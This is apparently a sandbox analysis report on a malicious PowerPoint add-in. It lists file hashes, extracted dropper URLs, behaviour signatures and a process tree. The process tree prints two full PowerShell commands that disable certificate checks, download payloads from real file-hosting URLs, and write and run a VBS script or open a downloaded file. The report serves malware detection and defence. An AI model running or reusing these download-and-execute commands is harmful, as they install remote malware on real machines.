Analysis

  • max time kernel
    61s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 16:00

General

  • Target

    16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497.ppam

  • Size

    7KB

  • MD5

    51b6a6b674b708af7d355f5b855f1f28

  • SHA1

    427f1a1ffb6235dbc91a8bb2ab7e0e89f1d669b5

  • SHA256

    16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497

  • SHA512

    dd5d7fc3940d8e1a783373b10a8595a364becfe7650a6f3f32e6b871dca1ee5623db6cb8d4b9b871c0a6ec1b47176860574af6333ccf1fdcf769041feea871af

  • SSDEEP

    192:xrXP/3GViyiM8+5byn/nKM5TYgcnHyvakYSq3YD:dXPuE+ann5TRs/Z3K

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/itm1dkgz7c

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/itm1dkgz7c' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.vbs -force ;wscript.exe x.vbs ; exit
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" x.vbs
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2408
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2688

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\x.vbs

      Filesize

      796B

      MD5

      b75621ae1faee608b4ed39e971d709a5

      SHA1

      bcd528eb22d2e7b1d11c9b603df87cec37d23da5

      SHA256

      54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

      SHA512

      5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21A56D1RTEBT417LRS9K.temp

      Filesize

      7KB

      MD5

      5f91436e32a1577e0351d7d389ffa4f6

      SHA1

      f2c81ffac236179fb998de44a65e5684534cbe2e

      SHA256

      0a138a85fad9c2b0d744a8f8a997b67da55fc6e702d80974710fc5520fb27ee1

      SHA512

      6cea8890a421c583a271d4da7c7c279898f3be9f6c58df61aa3aa5508c1274b08e8ddba8cb3c0b3ed6b077f45182987cc0ce841039c488760e237168097e69e8

    • memory/1936-4-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-5-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-9-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-2-0x000000007408D000-0x0000000074098000-memory.dmp

      Filesize

      44KB

    • memory/1936-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1936-0-0x000000002D921000-0x000000002D922000-memory.dmp

      Filesize

      4KB

    • memory/1936-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-21-0x000000007408D000-0x0000000074098000-memory.dmp

      Filesize

      44KB

    • memory/1936-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2688-23-0x00000000068E0000-0x000000000739A000-memory.dmp

      Filesize

      10.7MB